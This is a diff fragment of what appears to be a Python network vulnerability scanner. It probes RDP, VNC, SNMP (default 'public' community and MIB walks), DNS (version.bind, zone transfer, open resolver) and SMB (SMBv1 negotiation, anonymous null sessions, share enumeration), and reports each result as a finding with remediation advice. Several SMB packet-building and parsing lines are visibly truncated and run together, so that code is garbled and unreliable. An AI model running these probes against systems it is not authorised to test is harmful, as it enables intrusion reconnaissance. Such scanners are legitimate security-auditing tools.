+ """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + raw["banner"] = "RDP service open" + findings.append(Finding( + severity=Severity.INFO, + title="RDP service detected", + description=f"RDP port {port} is open on {target}, no further enumeration performed.", + evidence=f"TCP connect to {target}:{port} succeeded.", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "RDP", e) + return probe_result(raw_data=raw, findings=findings) + + def _service_info_vnc(self, target, port): # default port: 5900 + """ + VNC handshake: read version banner, negotiate security types. + + Security types: + 1 (None) → CRITICAL: unauthenticated desktop access + 2 (VNC Auth) → MEDIUM: DES-based, max 8-char password + 19 (VeNCrypt) → INFO: TLS-secured + Other → LOW: unknown auth type + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None, "security_types": []} + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # Read server banner (e.g. 
"RFB 003.008\n") + banner = sock.recv(12).decode('ascii', errors='ignore').strip() + raw["banner"] = banner + + if not banner.startswith("RFB"): + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"VNC service detected (non-standard banner: {banner[:30]})", + description="VNC port open but banner is non-standard.", + evidence=f"Banner: {banner}", + remediation="Restrict VNC access to trusted networks or use SSH tunneling.", + confidence="tentative", + )) + sock.close() + return probe_result(raw_data=raw, findings=findings) + + # Echo version back to negotiate + sock.sendall(banner.encode('ascii') + b"\n") + + # Read security type list + sec_data = sock.recv(64) + sec_types = [] + if len(sec_data) >= 1: + num_types = sec_data[0] + if num_types > 0 and len(sec_data) >= 1 + num_types: + sec_types = list(sec_data[1:1 + num_types]) + raw["security_types"] = sec_types + sock.close() + + _VNC_TYPE_NAMES = {1: "None", 2: "VNC Auth", 19: "VeNCrypt", 16: "Tight"} + type_labels = [f"{t}({_VNC_TYPE_NAMES.get(t, 'unknown')})" for t in sec_types] + raw["security_type_labels"] = type_labels + + if 1 in sec_types: + findings.append(Finding( + severity=Severity.CRITICAL, + title="VNC unauthenticated access (security type None)", + description=f"VNC on {target}:{port} allows connections without authentication.", + evidence=f"Banner: {banner}, security types: {type_labels}", + remediation="Disable security type None and require VNC Auth or VeNCrypt.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + if 2 in sec_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title="VNC password auth (DES-based, max 8 chars)", + description=f"VNC Auth uses DES encryption with a maximum 8-character password.", + evidence=f"Banner: {banner}, security types: {type_labels}", + remediation="Use VeNCrypt (TLS) or SSH tunneling instead of plain VNC Auth.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + if 19 in sec_types: + 
findings.append(Finding( + severity=Severity.INFO, + title="VNC VeNCrypt (TLS-secured)", + description="VeNCrypt provides TLS-secured VNC connections.", + evidence=f"Banner: {banner}, security types: {type_labels}", + confidence="certain", + )) + if not sec_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"VNC service exposed: {banner}", + description="VNC protocol banner detected but security types could not be parsed.", + evidence=f"Banner: {banner}", + remediation="Restrict VNC access to trusted networks.", + confidence="firm", + )) + + except Exception as e: + return probe_error(target, port, "VNC", e) + + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_snmp(self, target, port): # default port: 161 + """ + Attempt SNMP community string disclosure using 'public'. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + packet = bytes.fromhex( + "302e020103300702010304067075626c6963a019020405f5e10002010002010030100406082b060102010101000500" + ) + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + readable = ''.join(chr(b) if 32 <= b < 127 else '.' 
for b in data)
            if 'public' in readable.lower():
                raw["banner"] = readable.strip()[:120]
                findings.append(Finding(
                    severity=Severity.HIGH,
                    title="SNMP default community string 'public' accepted",
                    description="SNMP agent responds to the default 'public' community string, "
                                "allowing unauthenticated read access to device configuration and network data.",
                    evidence=f"Response: {readable.strip()[:80]}",
                    remediation="Change the community string from 'public' to a strong value; migrate to SNMPv3.",
                    owasp_id="A07:2021",
                    cwe_id="CWE-798",
                    confidence="certain",
                ))
                # Walk system MIB for additional intel
                mib_result = self._snmp_walk_system_mib(target, port)
                if mib_result:
                    sys_info = mib_result.get("system", {})
                    raw.update(sys_info)
                    findings.extend(mib_result.get("findings", []))
            else:
                raw["banner"] = readable.strip()[:120]
                findings.append(Finding(
                    severity=Severity.INFO,
                    title="SNMP service responded",
                    description=f"SNMP agent on {target}:{port} responded but did not accept 'public' community.",
                    evidence=f"Response: {readable.strip()[:80]}",
                    confidence="firm",
                ))
        except socket.timeout:
            return probe_error(target, port, "SNMP", Exception("timed out"))
        except Exception as e:
            return probe_error(target, port, "SNMP", e)
        finally:
            if sock is not None:
                sock.close()
        return probe_result(raw_data=raw, findings=findings)

    # -- SNMP MIB walk helpers ------------------------------------------------

    # Vendor names whose presence in sysDescr marks an ICS/SCADA device.
    _ICS_KEYWORDS = frozenset({
        "siemens", "simatic", "schneider", "allen-bradley", "honeywell",
        "abb", "modicon", "rockwell", "yokogawa", "emerson", "ge fanuc",
    })

    def _is_ics_indicator(self, text):
        # Case-insensitive substring match against the ICS vendor keyword list.
        lower = text.lower()
        return any(kw in lower for kw in self._ICS_KEYWORDS)

    @staticmethod
    def _snmp_encode_oid(oid_str):
        # BER OID encoding: first two arcs packed into one byte (40*a + b),
        # remaining arcs base-128 with high-bit continuation flags.
        parts = [int(p) for p in oid_str.split(".")]
        body = bytes([40 * parts[0] + parts[1]])
        for v in parts[2:]:
            if v < 128:
                body += bytes([v])
            else:
                chunks = []
                chunks.append(v & 0x7F)
                v >>= 7
                while v:
                    chunks.append(0x80 | (v & 0x7F))
                    v >>= 7
                body += bytes(reversed(chunks))
        return body

    def _snmp_build_getnext(self, community, oid_str, request_id=1):
        # Hand-rolled BER encoding of an SNMPv1 GetNextRequest (PDU tag 0xA1)
        # with a single null-valued varbind for the given OID.
        oid_body = self._snmp_encode_oid(oid_str)
        oid_tlv = bytes([0x06, len(oid_body)]) + oid_body
        varbind = bytes([0x30, len(oid_tlv) + 2]) + oid_tlv + b"\x05\x00"
        varbind_seq = bytes([0x30, len(varbind)]) + varbind
        req_id = bytes([0x02, 0x01, request_id & 0xFF])
        err_status = b"\x02\x01\x00"
        err_index = b"\x02\x01\x00"
        pdu_body = req_id + err_status + err_index + varbind_seq
        pdu = bytes([0xA1, len(pdu_body)]) + pdu_body
        version = b"\x02\x01\x00"
        comm = bytes([0x04, len(community)]) + community.encode()
        inner = version + comm + pdu
        return bytes([0x30, len(inner)]) + inner

    @staticmethod
    def _snmp_parse_response(data):
        # Minimal BER walk of a GetResponse; returns (oid_str, value) or (None, None).
        # NOTE(review): all `pos += 2 + data[pos+1]` skips assume short-form
        # (single-byte, < 128) BER lengths — long-form lengths would misparse.
        try:
            pos = 0
            if data[pos] != 0x30:
                return None, None
            pos += 2  # skip SEQUENCE tag + length
            # skip version
            if data[pos] != 0x02:
                return None, None
            pos += 2 + data[pos + 1]
            # skip community
            if data[pos] != 0x04:
                return None, None
            pos += 2 + data[pos + 1]
            # response PDU (0xA2)
            if data[pos] != 0xA2:
                return None, None
            pos += 2
            # skip request-id, error-status, error-index (3 integers)
            for _ in range(3):
                pos += 2 + data[pos + 1]
            # varbind list SEQUENCE
            pos += 2  # skip SEQUENCE tag + length
            # first varbind SEQUENCE
            pos += 2  # skip SEQUENCE tag + length
            # OID
            if data[pos] != 0x06:
                return None, None
            oid_len = data[pos + 1]
            oid_bytes = data[pos + 2: pos + 2 + oid_len]
            # decode OID (inverse of _snmp_encode_oid)
            parts = [str(oid_bytes[0] // 40), str(oid_bytes[0] % 40)]
            i = 1
            while i < len(oid_bytes):
                if oid_bytes[i] < 128:
                    parts.append(str(oid_bytes[i]))
                    i += 1
                else:
                    val = 0
                    while i < len(oid_bytes) and oid_bytes[i] & 0x80:
                        val = (val << 7) | (oid_bytes[i] & 0x7F)
                        i += 1
                    if i < len(oid_bytes):
                        val = (val << 7) | oid_bytes[i]
                        i += 1
                    parts.append(str(val))
            oid_str = ".".join(parts)
            pos += 2 + oid_len
            # value
            val_tag = data[pos]
            val_len = data[pos + 1]
            val_raw = data[pos + 2: pos + 2 + val_len]
            if val_tag == 0x04:  # OCTET STRING
                value = val_raw.decode("utf-8", errors="replace")
            elif val_tag == 0x02:  # INTEGER
                value = str(int.from_bytes(val_raw, "big", signed=True))
            elif val_tag == 0x43:  # TimeTicks
                value = str(int.from_bytes(val_raw, "big"))
            elif val_tag == 0x40:  # IpAddress (APPLICATION 0)
                if len(val_raw) == 4:
                    value = ".".join(str(b) for b in val_raw)
                else:
                    value = val_raw.hex()
            else:
                value = val_raw.hex()
            return oid_str, value
        except Exception:
            return None, None

    # MIB-II system group OIDs → friendly key names used in raw output.
    _SYSTEM_OID_NAMES = {
        "1.3.6.1.2.1.1.1": "sysDescr",
        "1.3.6.1.2.1.1.3": "sysUpTime",
        "1.3.6.1.2.1.1.4": "sysContact",
        "1.3.6.1.2.1.1.5": "sysName",
        "1.3.6.1.2.1.1.6": "sysLocation",
    }

    def _snmp_walk_system_mib(self, target, port):
        # Walk the MIB-II system subtree and ipAddrTable with community "public";
        # returns {"system": {...}, "findings": [...]} or None if nothing was learned.
        import ipaddress as _ipaddress
        system = {}
        walk_findings = []
        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(2)

            def _walk(prefix):
                # GetNext-based walk bounded to 20 steps under the given prefix.
                oid = prefix
                results = []
                for _ in range(20):
                    pkt = self._snmp_build_getnext("public", oid)
                    sock.sendto(pkt, (target, port))
                    try:
                        resp, _ = sock.recvfrom(1024)
                    except socket.timeout:
                        break
                    resp_oid, resp_val = self._snmp_parse_response(resp)
                    if resp_oid is None or not resp_oid.startswith(prefix + "."):
                        break
                    results.append((resp_oid, resp_val))
                    oid = resp_oid
                return results

            # Walk system MIB subtree
            for resp_oid, resp_val in _walk("1.3.6.1.2.1.1"):
                base = ".".join(resp_oid.split(".")[:8])
                name = self._SYSTEM_OID_NAMES.get(base)
                if name:
                    system[name] = resp_val

            sys_descr = system.get("sysDescr", "")
            if sys_descr:
                self._emit_metadata("os_claims", f"snmp:{port}", sys_descr)
                if self._is_ics_indicator(sys_descr):
                    walk_findings.append(Finding(
                        severity=Severity.HIGH,
                        title="SNMP exposes ICS/SCADA device identity",
                        description=f"sysDescr contains ICS keywords: 
{sys_descr[:120]}", + evidence=f"sysDescr={sys_descr[:120]}", + remediation="Isolate ICS devices from general network; restrict SNMP access.", + confidence="firm", + )) + + # Walk ipAddrTable for interface IPs + for resp_oid, resp_val in _walk("1.3.6.1.2.1.4.20.1.1"): + try: + addr = _ipaddress.ip_address(resp_val) + except (ValueError, TypeError): + continue + if addr.is_private: + self._emit_metadata("internal_ips", {"ip": str(addr), "source": f"snmp_interface:{port}"}) + walk_findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SNMP leaks internal IP address {addr}", + description="Interface IP from ipAddrTable is RFC1918, revealing internal topology.", + evidence=f"ipAddrEntry={resp_val}", + remediation="Restrict SNMP read access; filter sensitive MIBs.", + confidence="certain", + )) + except Exception: + pass + finally: + if sock is not None: + sock.close() + if not system and not walk_findings: + return None + return {"system": system, "findings": walk_findings} + + def _service_info_dns(self, target, port): # default port: 53 + """ + Query CHAOS TXT version.bind to detect DNS version disclosure. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
+ """ + findings = [] + raw = {"banner": None, "dns_version": None} + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + qname = b'\x07version\x04bind\x00' + question = struct.pack('>HH', 16, 3) + packet = header + qname + question + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + + # Parse CHAOS TXT response + parsed = False + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + ancount = struct.unpack('>H', data[6:8])[0] + if ancount: + idx = 12 + len(qname) + 4 + if idx < len(data): + if data[idx] & 0xc0 == 0xc0: + idx += 2 + else: + while idx < len(data) and data[idx] != 0: + idx += data[idx] + 1 + idx += 1 + idx += 8 + if idx + 2 <= len(data): + rdlength = struct.unpack('>H', data[idx:idx+2])[0] + idx += 2 + if idx < len(data): + txt_length = data[idx] + txt = data[idx+1:idx+1+txt_length].decode('utf-8', errors='ignore') + if txt: + raw["dns_version"] = txt + raw["banner"] = f"DNS version: {txt}" + findings.append(Finding( + severity=Severity.LOW, + title=f"DNS version disclosure: {txt}", + description=f"CHAOS TXT version.bind query reveals DNS software version.", + evidence=f"version.bind TXT: {txt}", + remediation="Disable version.bind responses in the DNS server configuration.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + parsed = True + # CVE check — version.bind is BIND-specific + _bind_m = _re.search(r'(\d+\.\d+(?:\.\d+)*)', txt) + if _bind_m: + findings += check_cves("bind", _bind_m.group(1)) + + # Fallback: check raw data for version keywords + if not parsed: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' 
for b in data) + if 'bind' in readable.lower() or 'version' in readable.lower(): + raw["banner"] = readable.strip()[:80] + findings.append(Finding( + severity=Severity.LOW, + title="DNS version disclosure via CHAOS TXT", + description=f"CHAOS TXT response on {target}:{port} contains version keywords.", + evidence=f"Response contains: {readable.strip()[:80]}", + remediation="Disable version.bind responses in the DNS server configuration.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + else: + raw["banner"] = "DNS service responding" + findings.append(Finding( + severity=Severity.INFO, + title="DNS CHAOS TXT query did not disclose version", + description=f"DNS on {target}:{port} responded but did not reveal version.", + confidence="firm", + )) + except socket.timeout: + return probe_error(target, port, "DNS", Exception("CHAOS query timed out")) + except Exception as e: + return probe_error(target, port, "DNS", e) + finally: + if sock is not None: + sock.close() + + # --- DNS zone transfer (AXFR) test --- + axfr_findings = self._dns_test_axfr(target, port) + findings += axfr_findings + + # --- Open recursive resolver test --- + resolver_finding = self._dns_test_open_resolver(target, port) + if resolver_finding: + findings.append(resolver_finding) + + return probe_result(raw_data=raw, findings=findings) + + def _dns_discover_zones(self, target, port): + """Discover zone names the DNS server is authoritative for. + + Strategy: send SOA queries for a set of candidate domains and check + for authoritative (AA-flag) responses. This is far more reliable than + reverse-DNS guessing when the target serves non-obvious zones. + + Returns list of domain strings (may be empty). + """ + candidates = set() + + # 1. 
Reverse DNS of target → extract domain + try: + import socket as _socket + hostname, _, _ = _socket.gethostbyaddr(target) + parts = hostname.split(".") + if len(parts) >= 2: + candidates.add(".".join(parts[-2:])) + if len(parts) >= 3: + candidates.add(".".join(parts[-3:])) + except Exception: + pass + + # 2. Common pentest / CTF domains + candidates.update(["vulhub.org", "example.com", "test.local"]) + + # 3. Probe each candidate with a SOA query — keep only authoritative hits + authoritative = [] + for domain in list(candidates): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + qname = b"" + for label in domain.split("."): + qname += bytes([len(label)]) + label.encode() + qname += b"\x00" + question = struct.pack('>HH', 6, 1) # QTYPE=SOA, QCLASS=IN + sock.sendto(header + qname + question, (target, port)) + data, _ = sock.recvfrom(512) + sock.close() + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + flags = struct.unpack('>H', data[2:4])[0] + aa = (flags >> 10) & 1 # Authoritative Answer + rcode = flags & 0x0F + ancount = struct.unpack('>H', data[6:8])[0] + if aa and rcode == 0 and ancount > 0: + authoritative.append(domain) + except Exception: + pass + + # Return authoritative zones first, then remaining candidates as fallback + seen = set(authoritative) + result = list(authoritative) + for d in candidates: + if d not in seen: + result.append(d) + return result + + def _dns_test_axfr(self, target, port): + """Attempt DNS zone transfer (AXFR) via TCP. + + Uses SOA-based zone discovery to find authoritative zones before + attempting AXFR, falling back to reverse DNS and common domains. + + Returns list of findings. 
+ """ + findings = [] + + test_domains = self._dns_discover_zones(target, port) + + for domain in test_domains[:4]: # Test at most 4 domains + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # Build AXFR query + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + # Encode domain name + qname = b"" + for label in domain.split("."): + qname += bytes([len(label)]) + label.encode() + qname += b"\x00" + # QTYPE=252 (AXFR), QCLASS=1 (IN) + question = struct.pack('>HH', 252, 1) + dns_query = header + qname + question + # TCP DNS: 2-byte length prefix + sock.sendall(struct.pack(">H", len(dns_query)) + dns_query) + + # Read response + resp_len_bytes = sock.recv(2) + if len(resp_len_bytes) < 2: + sock.close() + continue + resp_len = struct.unpack(">H", resp_len_bytes)[0] + resp_data = b"" + while len(resp_data) < resp_len: + chunk = sock.recv(resp_len - len(resp_data)) + if not chunk: + break + resp_data += chunk + sock.close() + + # Parse: check if we got answers (ancount > 0) and no error (rcode = 0) + if len(resp_data) >= 12: + resp_tid = struct.unpack(">H", resp_data[0:2])[0] + flags = struct.unpack(">H", resp_data[2:4])[0] + rcode = flags & 0x0F + ancount = struct.unpack(">H", resp_data[6:8])[0] + + if resp_tid == tid and rcode == 0 and ancount > 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"DNS zone transfer (AXFR) allowed for {domain}", + description=f"DNS on {target}:{port} permits zone transfers for '{domain}'. 
" + "This leaks all DNS records — hostnames, IPs, mail servers, internal infrastructure.", + evidence=f"AXFR query returned {ancount} answer records for {domain}.", + remediation="Restrict zone transfers to authorized secondary nameservers only (allow-transfer).", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + break # One confirmed AXFR is enough + except Exception: + continue + + return findings + + def _dns_test_open_resolver(self, target, port): + """Test if DNS server acts as an open recursive resolver. + + Returns Finding or None. + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + # Standard recursive query for example.com A record + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) # RD=1 + qname = b'\x07example\x03com\x00' + question = struct.pack('>HH', 1, 1) # QTYPE=A, QCLASS=IN + packet = header + qname + question + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + sock.close() + + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + flags = struct.unpack('>H', data[2:4])[0] + qr = (flags >> 15) & 1 + rcode = flags & 0x0F + ancount = struct.unpack('>H', data[6:8])[0] + ra = (flags >> 7) & 1 # Recursion Available + + if qr == 1 and rcode == 0 and ancount > 0 and ra == 1: + return Finding( + severity=Severity.MEDIUM, + title="DNS open recursive resolver detected", + description=f"DNS on {target}:{port} recursively resolves queries for external domains. 
" + "Open resolvers can be abused for DNS amplification DDoS attacks.", + evidence=f"Recursive query for example.com returned {ancount} answers with RA flag set.", + remediation="Restrict recursive queries to authorized clients only (allow-recursion).", + owasp_id="A05:2021", + cwe_id="CWE-406", + confidence="certain", + ) + except Exception: + pass + return None + + def _service_info_smb(self, target, port): # default port: 445 + """ + Probe SMB services: dialect negotiation, version extraction, CVE matching, + null session test, and security flag analysis. + + Checks performed: + + 1. SMB negotiate — determine supported dialect (SMBv1/v2/v3). + 2. Version extraction — parse Samba/Windows version from NativeOS/NativeLanMan. + 3. Security flags — check signing requirements. + 4. Null session — attempt anonymous IPC$ access. + 5. CVE matching — run check_cves on extracted Samba version. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = { + "banner": None, "dialect": None, "server_os": None, + "server_domain": None, "samba_version": None, + "signing_required": None, "smbv1_supported": False, + } + + # --- 1. 
SMBv1 Negotiate --- + # Build a proper SMBv1 Negotiate Protocol Request with NT LM 0.12 dialect + dialects = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" + smb_header = bytearray(32) + smb_header[0:4] = b"\xffSMB" # Protocol ID + smb_header[4] = 0x72 # Command: Negotiate + # Flags: 0x18 (case-sensitive, canonicalized paths) + smb_header[13] = 0x18 + # Flags2: unicode + NT status + long names + struct.pack_into("I", len(smb_payload)) + netbios_header = b"\x00" + netbios_header[1:] # force type=0 + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(4) + sock.connect((target, port)) + sock.sendall(netbios_header + smb_payload) + + # Read NetBIOS header (4 bytes) + full response + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + sock.close() + findings.append(Finding( + severity=Severity.INFO, + title="SMB port open but no negotiation response", + description=f"Port {port} is open but SMB did not respond to negotiation.", + confidence="tentative", + )) + return probe_result(raw_data=raw, findings=findings) + + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + resp_data = self._smb_recv_exact(sock, min(resp_len, 4096)) + sock.close() + + if not resp_data or len(resp_data) < 36: + raw["banner"] = "SMB response too short" + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMB service responded to negotiation probe", + description=f"SMB on {target}:{port} accepts negotiation requests.", + evidence=f"Response: {(resp_data or b'').hex()[:48]}", + remediation="Restrict SMB access to trusted networks; disable SMBv1.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + return probe_result(raw_data=raw, findings=findings) + + # Check if SMBv1 or SMBv2 response + protocol_id = resp_data[0:4] + + if protocol_id == b"\xffSMB": + # --- SMBv1 response --- + raw["smbv1_supported"] = True + raw["banner"] = "SMBv1 negotiation response received" + + # Parse negotiate response body 
(after 32-byte header) + if len(resp_data) >= 37: + word_count = resp_data[32] + if word_count >= 17 and len(resp_data) >= 32 + 1 + 34: + words_start = 33 + dialect_idx = struct.unpack_from("= 17 and len(resp_data) >= words_start + 2 + 22 + 2: + sec_blob_len = struct.unpack_from("= 1: + raw["server_domain"] = parts[0] + if len(parts) >= 2: + raw["server_name"] = parts[1] + except Exception: + pass + + # SMBv1 is a security concern + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMBv1 protocol supported (legacy, attack surface for MS17-010)", + description=f"SMB on {target}:{port} supports SMBv1, which is vulnerable to " + "EternalBlue (MS17-010) and other SMBv1-specific attacks.", + evidence=f"Negotiated dialect: {raw['dialect']}, SMBv1 response received.", + remediation="Disable SMBv1 on the server (e.g., 'server min protocol = SMB2' in smb.conf).", + owasp_id="A06:2021", + cwe_id="CWE-757", + confidence="certain", + )) + + elif protocol_id == b"\xfeSMB": + # --- SMBv2/3 response --- + raw["banner"] = "SMBv2 negotiation response received" + if len(resp_data) >= 72: + smb2_dialect = struct.unpack_from(" Session Setup (null) -> Tree Connect IPC$ -> + Open \\srvsvc pipe -> DCE/RPC Bind -> NetShareEnumAll -> parse results. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + SMB port (typically 445). + + Returns + ------- + list[dict] + Each dict has keys ``name`` (str), ``type`` (int), ``comment`` (str). + Returns empty list on any failure. + """ + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(4) + sock.connect((target, port)) + + def _send_smb(payload): + nb_hdr = b"\x00" + struct.pack(">I", len(payload))[1:] + sock.sendall(nb_hdr + payload) + + def _recv_smb(): + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + return None + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + return self._smb_recv_exact(sock, min(resp_len, 65536)) + + # ---- 1. 
Negotiate (NT LM 0.12) ---- + dialects = b"\x02NT LM 0.12\x00" + smb_hdr = bytearray(32) + smb_hdr[0:4] = b"\xffSMB" + smb_hdr[4] = 0x72 # Negotiate + smb_hdr[13] = 0x18 + struct.pack_into(" len(enum_resp): + data_len = len(enum_resp) - data_off + if data_off >= len(enum_resp) or data_len < 24: + return [] + + dce_data = enum_resp[data_off:data_off + data_len] + + # DCE/RPC response header is 24 bytes, then stub data + if len(dce_data) < 24: + return [] + dce_stub = dce_data[24:] + + return self._parse_netshareenumall_response(dce_stub) + + except Exception: + return [] + finally: + if sock: + try: + sock.close() + except Exception: + pass + + @staticmethod + def _parse_netshareenumall_response(stub): + """Parse NetShareEnumAll DCE/RPC stub response into share list. + + Parameters + ---------- + stub : bytes + DCE/RPC stub data (after the 24-byte response header). + + Returns + ------- + list[dict] + Each dict: {"name": str, "type": int, "comment": str}. + """ + shares = [] + try: + if len(stub) < 20: + return [] + + # Response stub layout: + # [4] info_level + # [4] switch_value + # [4] referent pointer for SHARE_INFO_1_CONTAINER + # [4] entries_read + # [4] referent pointer for array + # Then for each entry: [4] name_ptr, [4] type, [4] comment_ptr + # Then the actual strings (NDR conformant arrays) + + offset = 0 + offset += 4 # info_level + offset += 4 # switch_value + offset += 4 # referent pointer + if offset + 4 > len(stub): + return [] + entries_read = struct.unpack_from(" 500: + return [] + + offset += 4 # array referent pointer + offset += 4 # max count (NDR array header) + + # Read the fixed-size entries: name_ptr(4) + type(4) + comment_ptr(4) each + entry_records = [] + for _ in range(entries_read): + if offset + 12 > len(stub): + break + name_ptr = struct.unpack_from(" len(data): + return "", off + max_count = struct.unpack_from(" len(data): + s = data[off:].decode("utf-16-le", errors="ignore").rstrip("\x00") + return s, len(data) + s = data[off:off + 
byte_len].decode("utf-16-le", errors="ignore").rstrip("\x00") + off += byte_len + # Align to 4-byte boundary + if off % 4: + off += 4 - (off % 4) + return s, off + + for name_ptr, share_type, comment_ptr in entry_records: + name, offset = read_ndr_string(stub, offset) + comment, offset = read_ndr_string(stub, offset) + if name: + shares.append({ + "name": name, + "type": share_type, + "comment": comment, + }) + + except Exception: + pass + return shares + + def _smb_try_null_session(self, target, port): + """Attempt SMBv1 null session to extract Samba version from SessionSetup response. + + Returns + ------- + str or None + Extracted Samba version string (e.g. '4.6.3'), or None. + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # --- Negotiate --- + dialects = b"\x02NT LM 0.12\x00" + smb_header = bytearray(32) + smb_header[0:4] = b"\xffSMB" + smb_header[4] = 0x72 # Negotiate + smb_header[13] = 0x18 + struct.pack_into("I", len(payload))[1:] + sock.sendall(nb_hdr + payload) + + # Read negotiate response + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + sock.close() + return None + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + self._smb_recv_exact(sock, min(resp_len, 4096)) + + # --- Session Setup AndX (null session) --- + smb_header2 = bytearray(32) + smb_header2[0:4] = b"\xffSMB" + smb_header2[4] = 0x73 # Session Setup AndX + smb_header2[13] = 0x18 + struct.pack_into("I", len(payload2))[1:] + sock.sendall(nb_hdr2 + payload2) + + # Read session setup response + resp_hdr2 = self._smb_recv_exact(sock, 4) + if not resp_hdr2: + sock.close() + return None + resp_len2 = struct.unpack(">I", b"\x00" + resp_hdr2[1:4])[0] + resp_data2 = self._smb_recv_exact(sock, min(resp_len2, 4096)) + sock.close() + + if not resp_data2: + return None + + # Extract NativeOS string — contains "Samba x.y.z" or "Windows ..." 
+ # Search the response bytes for "Samba" followed by a version + resp_text = resp_data2.decode("utf-8", errors="ignore") + samba_match = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text) + if samba_match: + return samba_match.group(1) + + # Also try UTF-16-LE decoding + resp_text_u16 = resp_data2.decode("utf-16-le", errors="ignore") + samba_match_u16 = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text_u16) + if samba_match_u16: + return samba_match_u16.group(1) + + except Exception: + pass + return None + + + # NetBIOS name suffix → human-readable type + _NBNS_SUFFIX_TYPES = { + 0x00: "Workstation", + 0x03: "Messenger (logged-in user)", + 0x20: "File Server (SMB sharing)", + 0x1C: "Domain Controller", + 0x1B: "Domain Master Browser", + 0x1E: "Browser Election Service", + } + + def _service_info_wins(self, target, port): # ports: 42 (WINS/TCP), 137 (NBNS/UDP) + """ + Probe WINS / NetBIOS Name Service for name enumeration and service detection. + + Port 42 (TCP): WINS replication — sends MS-WINSRA Association Start Request + to fingerprint the service and extract NBNS version. Also fires a UDP + side-probe to port 137 for NetBIOS name enumeration. + Port 137 (UDP): NBNS — sends wildcard node-status query (RFC 1002) to + enumerate registered NetBIOS names. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. 
